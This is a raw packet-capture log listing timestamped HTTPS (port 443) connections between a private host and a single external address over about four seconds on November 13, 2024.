Nov 13, 2024 18:44:14.852523088 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.852565050 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:14.852756977 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.852813959 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:14.852828026 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.153711081 CET	49787	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.153779984 CET	443	49787	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.189919949 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.189970970 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.190244913 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.190244913 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.190330982 CET	49788	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.190368891 CET	443	49788	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.192867994 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.193247080 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.193339109 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.193432093 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.193646908 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.193711042 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.194057941 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.194075108 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.194201946 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.194237947 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.323370934 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.323991060 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.324081898 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.324358940 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.324417114 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.344465971 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.344521999 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.344703913 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.344703913 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.344703913 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.347558022 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.347600937 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.347816944 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.347816944 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.347884893 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.465878010 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.466034889 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.466219902 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.466219902 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.466221094 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.468416929 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.468508005 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.468597889 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.468748093 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.468767881 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.495284081 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.495743036 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.495837927 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.496119022 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.496175051 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.613688946 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.614204884 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.614231110 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.614784002 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.614790916 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.634569883 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.634640932 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.634705067 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.635036945 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.635037899 CET	49791	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.635107994 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.635152102 CET	443	49791	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.637715101 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.637803078 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.637912035 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.638118029 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.638145924 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.653726101 CET	49789	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.653789997 CET	443	49789	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.744291067 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.744674921 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.744731903 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.744795084 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.744815111 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.744829893 CET	49792	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.744837046 CET	443	49792	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.747235060 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.747323990 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.747404099 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.747733116 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.747801065 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.778848886 CET	49790	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.778914928 CET	443	49790	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.949471951 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.950335026 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.950401068 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:15.950798988 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:15.950813055 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.078306913 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.078543901 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.078731060 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.078731060 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.078731060 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.080041885 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.080491066 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.080524921 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.081067085 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.081110001 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.081387043 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.081475973 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.081562996 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.081679106 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.081702948 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.208494902 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.208646059 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.208794117 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.208853006 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.208865881 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.208882093 CET	49794	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.208888054 CET	443	49794	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.211322069 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.211410999 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.211519003 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.211662054 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.211694956 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.222189903 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.222610950 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.222697973 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.222932100 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.222948074 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.356410980 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.356581926 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.356674910 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.356761932 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.356761932 CET	49795	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.356808901 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.356838942 CET	443	49795	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.359457970 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.359545946 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.359656096 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.359951973 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.360038996 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.388117075 CET	49793	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.388180971 CET	443	49793	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.488718987 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.489257097 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.489346981 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.489639997 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.489697933 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.617201090 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.617553949 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.617742062 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.617742062 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.617743015 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.620039940 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.620079994 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.620177031 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.620347023 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.620354891 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.802529097 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.802970886 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.803034067 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.803369045 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.803383112 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.835422039 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.837284088 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.837372065 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.837806940 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.837863922 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.919477940 CET	49797	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.919543982 CET	443	49797	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.953526974 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.953676939 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.953859091 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.953978062 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.953978062 CET	49796	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.954020977 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.954056025 CET	443	49796	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.958394051 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.958484888 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.958591938 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.959645987 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.959688902 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.962673903 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.968444109 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.968914986 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.969086885 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.972795010 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.972857952 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.973386049 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.973443031 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.974195004 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.974195004 CET	49798	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.974262953 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.974297047 CET	443	49798	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.977123976 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.977161884 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:16.977233887 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.977366924 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:16.977381945 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.102258921 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.102416992 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.102586985 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.102953911 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.102953911 CET	49799	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.103024006 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.103060961 CET	443	49799	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.112369061 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.153875113 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.154675961 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.154732943 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.155282021 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.155337095 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.274816036 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.274904966 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.275027990 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.283498049 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.283682108 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.283879042 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.397233963 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.397320986 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.397403955 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.397404909 CET	49800	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.397474051 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.397509098 CET	443	49800	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.406367064 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.407891035 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.407911062 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.408482075 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.408487082 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.527813911 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.527914047 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.528032064 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.528413057 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.528439045 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.542071104 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.542229891 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.542295933 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.542500973 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.542519093 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.542531013 CET	49801	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.542536974 CET	443	49801	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.544713974 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.544802904 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.544883966 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.545155048 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.545191050 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.687674999 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.688230991 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.688296080 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.688756943 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.688772917 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.755573988 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.755981922 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.755997896 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.756505966 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.756511927 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.817779064 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.818027020 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.818200111 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.818201065 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.818201065 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.820425987 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.820523977 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.820616961 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.820746899 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.820769072 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.888581991 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.888619900 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.888659954 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.888761997 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.888772011 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.888798952 CET	49803	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.888802052 CET	443	49803	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.890537977 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.890548944 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:17.890695095 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.890808105 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:17.890829086 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.122718096 CET	49802	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.122781992 CET	443	49802	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.137789011 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.138443947 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.138525009 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.138923883 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.138981104 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.272109985 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.272789001 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.273075104 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.273160934 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.273160934 CET	49804	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.273201942 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.273230076 CET	443	49804	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.275736094 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.275837898 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.276110888 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.276256084 CET	49809	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.276283026 CET	443	49809	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.277371883 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.279635906 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.279969931 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.280000925 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.280031919 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.280073881 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.280402899 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.280410051 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.280467987 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.280479908 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.407828093 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.408000946 CET	443	49806	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.408327103 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.408327103 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.408327103 CET	49806	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.410546064 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.410581112 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.410768032 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.410829067 CET	49810	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.410839081 CET	443	49810	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.411499023 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.411689043 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.411763906 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.411844015 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.411844015 CET	49805	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.411887884 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.411919117 CET	443	49805	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.413733006 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.413821936 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.413901091 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.414208889 CET	49811	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.414295912 CET	443	49811	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.550540924 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.550949097 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.550992966 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.551362038 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.551369905 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.627532005 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.628051043 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.628073931 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.628381968 CET	49808	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.628386974 CET	443	49808	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.682317972 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.683196068 CET	443	49807	13.107.246.45	192.168.2.4
Nov 13, 2024 18:44:18.683552027 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.683552027 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.683552027 CET	49807	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.686495066 CET	49812	443	192.168.2.4	13.107.246.45
Nov 13, 2024 18:44:18.686530113 CET	443	49812	13.107.246.45	192.168.2.4
